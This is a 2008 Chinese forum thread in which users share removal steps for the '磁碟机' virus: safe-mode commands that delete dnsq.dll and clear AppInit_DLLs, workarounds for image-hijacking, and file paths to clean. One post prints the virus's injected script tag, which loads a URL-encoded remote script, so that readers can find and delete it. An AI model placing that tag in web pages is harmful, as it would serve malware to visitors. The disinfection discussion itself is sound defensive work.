内核级恶魔病毒— 磁碟机 样本（已找到专杀+rappar大师纯手工解决方案）

IllusionWing

佛云“难者不会，会者不难”

qianwenxiang

汗。。刚进来看的时候我还以为这个帖子在论坛周游一圈又跑回样本区了呢。。

ALEXBLAIR

首先，可以十分明确的说，你提供的样本在染毒后，重新启动到安全模式（命令提示符的）
，然后执行如下步骤即可清除病毒
（以卡巴为例子）

1. cd/d %windir%\system32
   
2. 
   
3. del /f dnsq.dll
   
4. 
   
5. echo .>dnsq.dll
   
6. 
   
7. echo Windows Registry Editor Version 5.00 >abc.reg
   
8. 
   
9. echo.>>abc.reg
   
10. 
    
11. echo [HKEY_USERS\55555555\machine\software\microsoft\windows nt\currentversion\Windows]>>abc.reg
    
12. 
    
13. echo "AppInit_DLLs"="" >>abc.reg
    
14. 
    
15. regedit.exe /s abc.reg
    
16. 
    
17. cd/d "%ProgramFiles%\Kaspersky Lab\Kaspersky Internet Security 7.0"
    
18. 
    
19. avp.exe /scan /all /i4

复制代码

如果你想手动处理，也是可以的
打开每一个html/js/htm的文件然后在最后一行删除掉

1. 
   
2. <script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>
   

复制代码

对于程序文件，你删除以下文档
\WINDOWS\system32\dnsq.dll                     31.5kb
?:\pagefile.exe                                             8 KB
然后清理镜像劫持
最后，用autoruns清理启动项
以上全部在安全模式下进行。

[ 本帖最后由 ALEXBLAIR 于 2008-3-2 21:43 编辑 ]

qianwenxiang

不知道管不管用的一玩意

ALEXBLAIR

这个是？释放dll的？

baidu找不到这个东西阿~~~~

google第一个就是~~~国产货果然不行~~

[ 本帖最后由 ALEXBLAIR 于 2008-3-2 22:02 编辑 ]

reg

红伞C版居然没报

hello8888

C:\...\王之王.rar >>RAR >>新建文件夹\pagefile.pif - 可能是 Win32/Genetik 木马 的一个变种

qianwenxiang

如果只有它一个去卸载DLL的话ms不行，GSS挂起那个进程的时候再卸载DLL就成功了

ALEXBLAIR

[:27:] 其实icesword打不开是因为采用了镜像劫持，改个名字就可以拉~~~
欧把icesword.exe改为pagefile.exe，和那个小鬼的名字一样就可以启动了。[:26:]

然后用is的进程限制，逐个取消lsass.exe的反复注入。

接下去清理他的服务和相关的启动项就可以了

qianwenxiang

文件夹太乱了 is记不得放在哪儿了 汗